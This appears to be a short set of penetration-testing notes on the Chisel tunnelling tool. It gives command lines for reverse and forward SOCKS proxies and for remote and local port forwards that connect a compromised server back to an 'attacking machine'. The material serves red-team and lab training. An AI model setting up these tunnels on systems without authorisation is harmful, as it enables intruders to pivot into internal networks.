https://github.com/jpillora/chisel is a tunneled proxy and port forwarding without needing SSH.

https://github.com/jpillora/chisel/releases

To use https://github.com/jpillora/chisel we need a copy of it on both the attacker and the relay, the tool offers two menu client and server chisel client|server --help

Reverse SOCKS Proxy

This connects back from a compromised server to a listener waiting on our attacking machine.

./chisel server -p LISTEN_PORT --reverse
./chisel client ATTACKING_IP:LISTEN_PORT R:socks &

Forward socks proxy

./chisel server -p LISTEN_PORT --socks5
./chisel client TARGET_IP:LISTEN_PORT PROXY_PORT:socks

<aside> 💡 When sending data through either of these proxies, we would need to set the port in our proxychains configuration. As Chisel uses a SOCKS5 proxy, we will also need to change the start of the line from socks4 to socks5:

Untitled

</aside>

Remote Port Forward

A remote port forward is when we connect back from a compromised target to create the forward.

./chisel server -p LISTEN_PORT --reverse &

Here the LISTEN_PORT is the port that we started the chisel server on, and the LOCAL_PORT is the port we wish to open on our own attacking machine to link with the desired target port.

./chisel client ATTACKING_IP:LISTEN_PORT R:LOCAL_PORT:TARGET_IP:TARGET_PORT &

Local port Forward

As with SSH, a local port forward is where we connect from our own attacking machine to a chisel server listening on a compromised target.

./chisel client LISTEN_IP:LISTEN_PORT LOCAL_PORT:TARGET_IP:TARGET_PORT
./chisel server -p LISTEN_PORT